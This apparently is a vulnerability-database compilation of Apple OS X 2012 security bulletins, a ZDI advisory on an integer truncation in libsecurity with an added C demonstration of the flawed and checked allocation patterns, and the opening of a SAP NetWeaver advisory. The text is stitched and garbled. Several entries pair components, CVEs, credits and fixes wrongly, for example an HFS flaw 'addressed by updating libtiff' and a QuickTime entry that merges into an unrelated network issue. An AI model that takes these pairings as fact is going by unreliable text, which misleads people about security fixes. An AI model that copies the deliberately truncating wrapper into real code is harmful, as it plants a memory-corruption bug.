The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
Security Update 2012-002 or OS X v10.7.4.
For OS X Lion v10.7.3
The download file is named: MacOSXUpd10.7.4.dmg
Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36
For OS X Lion v10.7 and v10.7.2
The download file is named: MacOSXUpdCombo10.7.4.dmg
Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f
For OS X Lion Server v10.7.3
The download file is named: MacOSXServerUpd10.7.4.dmg
Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2
For OS X Lion Server v10.7 and v10.7.2
The download file is named: MacOSXServerUpdCombo10.7.4.dmg
Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240
For Mac OS X v10.6.8
The download file is named: SecUpd2012-002Snow.dmg
Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2012-002.dmg
Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
Authentication is not required
to exploit this vulnerability.
The flaw exists within the libsecurity_cdsa_plugin which implements
routines defined in libsecurity_cssm. The library defines an allocation
routine as having an argument type uint32. The implemented methods in the
cdsa_plugin accept parameter having type size_t, this value is truncated
from 64 bits to 32 bits when being passed to the library routine. This can
lead to an underallocated memory region and ultimately a write out of
bounds.
-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can
be found at:
http://support.apple.com/kb/HT1222
-- Disclosure Timeline:
2011-11-29 - Vulnerability reported to vendor
2012-08-17 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* aazubel
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
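The size_t-to-uint32 truncation described in the ZDI text above, shown as an added C illustration that is not code from Apple, ZDI or libsecurity. The names lib_alloc32, plugin_alloc_truncating and plugin_alloc_checked are hypothetical stand-ins for the library routine and the plugin methods, and the request size is a constructed value.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical model of a library allocation routine whose size argument
 * is 32 bits wide. It records how many bytes it was really asked for. */
typedef struct {
    void    *ptr;
    uint32_t granted;   /* bytes actually allocated */
} lib_block;

static lib_block lib_alloc32(uint32_t size)
{
    lib_block b;
    b.ptr = malloc(size ? size : 1u);
    b.granted = b.ptr ? size : 0u;
    return b;
}

/* Flawed pattern: the wrapper accepts size_t but forwards it to the 32-bit
 * routine. In a 64-bit process the upper 32 bits are silently dropped, so
 * the block can be far smaller than the caller believes. */
static lib_block plugin_alloc_truncating(size_t size)
{
    return lib_alloc32((uint32_t)size);
}

/* Hardened pattern: refuse any request the narrower type cannot represent
 * instead of letting the conversion shrink it. */
static int plugin_alloc_checked(size_t size, lib_block *out)
{
    out->ptr = NULL;
    out->granted = 0;
    if (size > UINT32_MAX)
        return -1;                      /* would truncate: reject */
    *out = lib_alloc32((uint32_t)size);
    return out->ptr ? 0 : -1;
}

/* Bytes a caller would write past the end of the block if it trusted its
 * own size_t length rather than the size that was really granted. */
static size_t overrun_bytes(size_t requested, uint32_t granted)
{
    return requested > granted ? requested - granted : 0;
}

/* Helpers that exercise each wrapper and release the memory again. */
static uint32_t truncated_grant(size_t requested)
{
    lib_block b = plugin_alloc_truncating(requested);
    uint32_t g = b.granted;
    free(b.ptr);
    return g;
}

static int checked_result(size_t requested)
{
    lib_block b;
    int rc = plugin_alloc_checked(requested, &b);
    free(b.ptr);
    return rc;
}

int main(void)
{
    /* Constructed request: 0x100000010 in a 64-bit process. */
    size_t req = (size_t)UINT32_MAX + 17u;
    uint32_t got = truncated_grant(req);

    printf("requested %zu bytes, truncating wrapper allocated %lu\n",
           req, (unsigned long)got);
    printf("a caller trusting its own length would overrun by %zu bytes\n",
           overrun_bytes(req, got));
    printf("checked wrapper returns %d for the same request\n",
           checked_result(req));
    printf("checked wrapper returns %d for a 64-byte request\n",
           checked_result(64));
    return 0;
}
```

In a 32-bit process size_t is already 32 bits wide, so no truncation occurs, which matches the advisory's statement that 32-bit processes are not affected.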
| VAR-201205-0231 | CVE-2012-0658 | Apple Mac OS X of QuickTime Vulnerable to buffer overflow |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Buffer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted audio sample tables in a movie file that is progressively downloaded. Apple Mac OS X is prone to a buffer overflow vulnerability that affects the QuickTime component.
Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002
OS X Lion v10.7.4 and Security Update 2012-002 is now available and
addresses the following:
Login Window
Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3
Impact: Remote admins and persons with physical access to the system
may obtain account information
Description: An issue existed in the handling of network account
logins. The login process recorded sensitive information in the
system log, where other users of the system could read it. The
sensitive information may persist in saved logs after installation of
this update. See http://support.apple.com/kb/TS4272 for more
information on how to securely remove any remaining records. This
issue only affects systems running OS X Lion v10.7.3 with users of
Legacy File Vault and/or networked home directories.
CVE-ID
CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State
University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine
Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State
University, Paul Nelson
Bluetooth
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A temporary file race condition issue existed in
blued's initialization routine.
CVE-ID
CVE-2012-0649 : Aaron Sigel of vtty.com
curl
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
curl disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by enabling empty fragments.
CVE-ID
CVE-2011-3389 : Apple
curl
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Using curl or libcurl with a maliciously crafted URL may
lead to protocol-specific data injection attacks
Description: A data injection issue existed in curl's handling of
URLs. This issue is addressed through improved validation of URLs.
This issue does not affect systems prior to OS X Lion.
CVE-ID
CVE-2012-0036
Directory Service
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8
Impact: A remote attacker may obtain sensitive information
Description: Multiple issues existed in the directory server's
handling of messages from the network. By sending a maliciously
crafted message, a remote attacker could cause the directory server
to disclose memory from its address space, potentially revealing
account credentials or other sensitive information. This issue does
not affect OS X Lion systems. The Directory Server is disabled by
default in non-server installations of OS X.
CVE-ID
CVE-2012-0651 : Agustin Azubel
HFS
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Mounting a maliciously crafted disk image may lead to a
system shutdown or arbitrary code execution
Description: An integer underflow existed in the handling of HFS
catalog files. This issue does not affect OS X
Lion systems. This issue is addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Kernel
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: When FileVault is used, the disk may contain unencrypted
user data
Description: An issue in the kernel's handling of the sleep image
used for hibernation left some data unencrypted on disk even when
FileVault was enabled. This issue is addressed through improved
handling of the sleep image, and by overwriting the existing sleep
image when updating to OS X v10.7.4. This issue does not affect
systems prior to OS X Lion.
CVE-ID
CVE-2011-3212 : Felix Groebert of Google Security Team
libarchive
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Extracting a maliciously crafted archive may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple buffer overflows existed in the handling of
tar archives and iso9660 files.
CVE-ID
CVE-2011-1777
CVE-2011-1778
libsecurity
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Verifying a maliciously crafted X.509 certificate, such as
when visiting a maliciously crafted website, may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access issue existed in the
handling of X.509 certificates.
CVE-ID
CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme
Prado of Conselho da Justica Federal, Ryan Sleevi of Google
libsecurity
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Support for X.509 certificates with insecure-length RSA keys
may expose users to spoofing and information disclosure
Description: Certificates signed using RSA keys with insecure key
lengths were accepted by libsecurity. This issue is addressed by
rejecting certificates containing RSA keys less than 1024 bits.
CVE-ID
CVE-2012-0655
libxml
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted web page may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple vulnerabilities existed in libxml, the most
serious of which may lead to an unexpected application termination or
arbitrary code execution. These issues are addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
LoginUIFramework
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: If the Guest user is enabled, a user with physical access to
the computer may be able to log in to a user other than the Guest
user without entering a password
Description: A race condition existed in the handling of Guest user
logins. This issue does not affect systems prior to OS X Lion.
CVE-ID
CVE-2012-0656 : Francisco Gomez (espectalll123)
PHP
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Multiple vulnerabilities in PHP
Description: PHP is updated to version 5.3.10 to address several
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the PHP web site at
http://www.php.net
CVE-ID
CVE-2011-4566
CVE-2011-4885
CVE-2012-0830
Quartz Composer
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: A user with physical access to the computer may be able to
cause Safari to launch if the screen is locked and the RSS Visualizer
screen saver is used
Description: An access control issue existed in Quartz Composer's
handling of screen savers. This issue is addressed through improved
checking for whether or not the screen is locked.
CVE-ID
CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted MPEG file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of MPEG
files.
CVE-ID
CVE-2012-0659 : An anonymous researcher working with HP's Zero Day
Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted MPEG file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer underflow existed in the handling of MPEG
files. This issue does not affect systems
prior to OS X Lion. By sending a maliciously crafted packet,
an unauthenticated remote attacker could cause a denial of service or
arbitrary code execution with system privileges. These issues do not
affect OS X Lion systems.
CVE-ID
CVE-2012-0870 : Andy Davis of NGS Secure
CVE-2012-1182 : An anonymous researcher working with HP's Zero Day
Initiative
Security Framework
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: A remote attacker may cause an unexpected application
termination or arbitrary code execution
Description: An integer overflow existed in the Security framework.
Processing untrusted input with the Security framework could result
in memory corruption. This issue does not affect 32-bit processes.
CVE-ID
CVE-2012-0662 : aazubel working with HP's Zero Day Initiative
Time Machine
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: A remote attacker may access a user's Time Machine backup
credentials
Description: The user may designate a Time Capsule or remote AFP
volume attached to an AirPort Base Station to be used for Time
Machine backups. Beginning with AirPort Base Station and Time Capsule
Firmware Update 7.6, Time Capsules and Base Stations support a secure
SRP-based authentication mechanism over AFP. However, Time Machine
did not require that the SRP-based authentication mechanism was used
for subsequent backup operations, even if Time Machine was initially
configured or had ever contacted a Time Capsule or Base Station that
supported it. An attacker who is able to spoof the remote volume
could gain access to user's Time Capsule credentials, although not
backup data, sent by the user's system. This issue is addressed by
requiring use of the SRP-based authentication mechanism if the backup
destination has ever supported it.
CVE-ID
CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc.
X11
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Applications that use libXfont to process LZW-compressed
data may be vulnerable to an unexpected application termination or
arbitrary code execution
Description: A buffer overflow existed in libXfont's handling of
LZW-compressed data. This issue is addressed by updating libXfont to
version 1.4.4.
CVE-ID
CVE-2011-2895 : Tomas Hoger of Red Hat
Note: Additionally, this update filters dynamic linker environment
variables from a customized environment property list in the user's
home directory, if present.
OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from
the Software Update pane in System Preferences, or Apple's Software
Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
Security Update 2012-002 or OS X v10.7.4.
For OS X Lion v10.7.3
The download file is named: MacOSXUpd10.7.4.dmg
Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36
For OS X Lion v10.7 and v10.7.2
The download file is named: MacOSXUpdCombo10.7.4.dmg
Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f
For OS X Lion Server v10.7.3
The download file is named: MacOSXServerUpd10.7.4.dmg
Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2
For OS X Lion Server v10.7 and v10.7.2
The download file is named: MacOSXServerUpdCombo10.7.4.dmg
Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240
For Mac OS X v10.6.8
The download file is named: SecUpd2012-002Snow.dmg
Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2012-002.dmg
Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201205-0229 | CVE-2012-0652 | Apple Mac OS X Vulnerabilities in which important information is obtained in the login window |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
Login Window in Apple Mac OS X 10.7.3, when Legacy File Vault or networked home directories are enabled, does not properly restrict what is written to the system log for network logins, which allows local users to obtain sensitive information by reading the log. Apple Mac OS X is prone to a local security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive account information.
Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. The login process recorded sensitive information in the
system log, where other users of the system could read it. The
sensitive information may persist in saved logs after installation of
this update. See http://support.apple.com/kb/TS4272 for more
information on how to securely remove any remaining records. By sending a maliciously
crafted message, a remote attacker could cause the directory server
to disclose memory from its address space, potentially revealing
account credentials or other sensitive information. By sending a maliciously crafted packet,
an unauthenticated remote attacker could cause a denial of service or
arbitrary code execution with system privileges.
Processing untrusted input with the Security framework could result
in memory corruption. This issue does not affect 32-bit processes. Beginning with AirPort Base Station and Time Capsule
Firmware Update 7.6, Time Capsules and Base Stations support a secure
SRP-based authentication mechanism over AFP. However, Time Machine
did not require that the SRP-based authentication mechanism was used
for subsequent backup operations, even if Time Machine was initially
configured or had ever contacted a Time Capsule or Base Station that
supported it. An attacker who is able to spoof the remote volume
could gain access to user's Time Capsule credentials, although not
backup data, sent by the user's system. This issue is addressed by
requiring use of the SRP-based authentication mechanism if the backup
destination has ever supported it.
CVE-ID
CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc.
CVE-ID
CVE-2011-2895 : Tomas Hoger of Red Hat
Note: Additionally, this update filters dynamic linker environment
variables from a customized environment property list in the user's
home directory, if present. Further information is available via the Apache web site at
http://httpd.apache.org/. This issue does not affect OS X Mountain
Lion systems.
CVE-ID
CVE-2011-3368
CVE-2011-3607
CVE-2011-4317
CVE-2012-0021
CVE-2012-0031
CVE-2012-0053
BIND
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: A remote attacker may be able to cause a denial of service
in systems configured to run BIND as a DNS nameserver
Description: A reachable assertion issue existed in the handling of
DNS records. This issue was addressed by updating to BIND 9.7.6-P1.
This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2011-4313
BIND
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4,
OS X Mountain Lion v10.8 and v10.8.1
Impact: A remote attacker may be able to cause a denial of service,
data corruption, or obtain sensitive information from process memory
in systems configured to run BIND as a DNS nameserver
Description: A memory management issue existed in the handling of
DNS records. This issue was addressed by updating to BIND 9.7.6-P1 on
OS X Lion systems, and BIND 9.8.3-P1 on OS X Mountain Lion systems.
CVE-ID
CVE-2012-1667
CoreText
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: Applications that use CoreText may be vulnerable to an
unexpected application termination or arbitrary code execution
Description: A bounds checking issue existed in the handling of text
glyphs, which may lead to out of bounds memory reads or writes. This
issue was addressed through improved bounds checking.
CVE-ID
CVE-2012-3716 : Jesse Ruderman of Mozilla Corporation
Data Security
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4,
OS X Mountain Lion v10.8 and v10.8.1
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: TrustWave, a trusted root CA, has issued, and
subsequently revoked, a sub-CA certificate from one of its trusted
anchors. This sub-CA facilitated the interception of communications
secured by Transport Layer Security (TLS). This update adds the
involved sub-CA certificate to OS X's list of untrusted certificates.
DirectoryService
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8
Impact: If the DirectoryService Proxy is used, a remote attacker may
cause a denial of service or arbitrary code execution
Description: A buffer overflow existed in the DirectoryService
Proxy. This issue was addressed through improved bounds checking.
This issue does not affect OS X Lion and Mountain Lion systems.
CVE-ID
CVE-2012-0650 : aazubel working with HP's Zero Day Initiative
ImageIO
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libpng's
handling of PNG images. These issues were addressed through improved
validation of PNG images. These issues do not affect OS X Mountain
Lion systems.
CVE-ID
CVE-2011-3026 : Juri Aedla
CVE-2011-3048
ImageIO
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow issue existed in libTIFF's handling
of TIFF images. This issue was addressed through improved validation
of TIFF images. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-1173 : Alexander Gavrun working with HP's Zero Day
Initiative
Installer
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: Remote admins and persons with physical access to the system
may obtain account information
Description: The fix for CVE-2012-0652 in OS X Lion 10.7.4 prevented
user passwords from being recorded in the system log, but did not
remove the old log entries. This issue was addressed by deleting log
files that contained passwords.
CVE-ID
CVE-2012-0652
International Components for Unicode
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Applications that use ICU may be vulnerable to an unexpected
application termination or arbitrary code execution
Description: A stack buffer overflow existed in the handling of ICU
locale IDs. This issue was addressed through improved bounds
checking. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2011-4599
Kernel
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: A malicious program could bypass sandbox restrictions
Description: A logic issue existed in the handling of debug system
calls. This may allow a malicious program to gain code execution in
other programs with the same user privileges. This issue was
addressed by disabling handling of addresses in PT_STEP and
PT_CONTINUE. This issue does not affect OS X Mountain Lion systems. This issue was
addressed by preventing user-installed methods from being used when
the system is handling login information.
CVE-ID
CVE-2012-3718 : An anonymous researcher
Mail
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing an e-mail message may lead to execution of web
plugins
Description: An input validation issue existed in Mail's handling of
embedded web plugins. This issue was addressed by disabling third-
party plug-ins in Mail. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-3719 : Will Dormann of the CERT/CC
Mobile Accounts
Available for: OS X Mountain Lion v10.8 and v10.8.1
Impact: A user with access to the contents of a mobile account may
obtain the account password
Description: Creating a mobile account saved a hash of the password
in the account, which was used to login when the mobile account was
used as an external account. The password hash could be used to
determine the user's password. This issue was addressed by creating
the password hash only if external accounts are enabled on the system
where the mobile account is created.
CVE-ID
CVE-2012-3720 : Harald Wagener of Google, Inc.
Further information is available via the PHP web site at
http://www.php.net
CVE-ID
CVE-2012-0831
CVE-2012-1172
CVE-2012-1823
CVE-2012-2143
CVE-2012-2311
CVE-2012-2386
CVE-2012-2688
PHP
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: PHP scripts which use libpng may be vulnerable to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
PNG files. This issue was addressed by updating PHP's copy of libpng
to version 1.5.10. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2011-3048
Profile Manager
Available for: OS X Lion Server v10.7 to v10.7.4
Impact: An unauthenticated user could enumerate managed devices
Description: An authentication issue existed in the Device
Management private interface. This issue was addressed by removing
the interface. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-3721 : Derick Cassidy of XEquals Corporation
QuickLook
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted .pict file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
.pict files. This issue was addressed through improved validation of
.pict files. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-0671 : Rodrigo Rubira Branco (twitter.com/bsdaemon) from the
Qualys Vulnerability & Malware Research Labs (VMRL)
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in QuickTime's handling of
sean atoms. This issue was addressed through improved bounds
checking. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-0670 : Tom Gallagher (Microsoft) and Paul Bates (Microsoft)
working with HP's Zero Day Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access existed in the handling
of Sorenson encoded movie files. This issue was addressed through
improved memory initialization. This issue does not affect OS X
Mountain Lion systems.
CVE-ID
CVE-2012-3722 : Will Dormann of the CERT/CC
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of RLE
encoded movie files. This issue was addressed through improved bounds
checking. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-0668 : Luigi Auriemma working with HP's Zero Day Initiative
Ruby
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
The Ruby OpenSSL module disabled the 'empty fragment' countermeasure
which prevented these attacks. This issue was addressed by enabling
empty fragments. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2011-3389
USB
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: Attaching a USB device may lead to an unexpected system
termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
USB hub descriptors. This issue was addressed through improved
handling of the bNbrPorts descriptor field. This issue does not
affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-3723 : Andy Davis of NGS Secure
Note: OS X Mountain Lion v10.8.2 includes the content of
Safari 6.0.1. For further details see "About the security content
of Safari 6.0.1" at http://support.apple.com/kb/HT5502
OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and Security Update
2012-004 may be obtained from the Software Update pane in System
Preferences, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 or Security Update
2012-004.
For OS X Mountain Lion v10.8.1
The download file is named: OSXUpd10.8.2.dmg
Its SHA-1 digest is: d6779e1cc748b78af0207499383b1859ffbebe33
For OS X Mountain Lion v10.8
The download file is named: OSXUpdCombo10.8.2.dmg
Its SHA-1 digest is: b08f10233d362e39f20b69f91d1d73f5e7b68a2c
For OS X Lion v10.7.4
The download file is named: MacOSXUpd10.7.5.dmg
Its SHA-1 digest is: e0a9582cce9896938a7a541bd431862d93893532
For OS X Lion v10.7 and v10.7.3
The download file is named: MacOSXUpdCombo10.7.5.dmg
Its SHA-1 digest is: f7a26b164fa10dae4fe646e57b01c34a619c8d9b
For OS X Lion Server v10.7.4
The download file is named: MacOSXServerUpd10.7.5.dmg
Its SHA-1 digest is: a891b03bfb4eecb745c0c39a32f39960fdb6796a
For OS X Lion Server v10.7 and v10.7.3
The download file is named: MacOSXServerUpdCombo10.7.5.dmg
Its SHA-1 digest is: df6e1748ab0a3c9e05c890be49d514673efd965e
For Mac OS X v10.6.8
The download file is named: SecUpd2012-004.dmg
Its SHA-1 digest is: 5b136e29a871d41012f0c6ea1362d6210c8b4fb7
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2012-004.dmg
Its SHA-1 digest is: 9b24496be15078e58a88537700f2f39c112e3b28
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-202002-0024 | CVE-2011-1517 |
SAP NetWeaver Vulnerability in
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash. SAP NetWeaver contains an unspecified vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
SAP Netweaver Dispatcher Multiple Vulnerabilities
1. *Advisory Information*
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
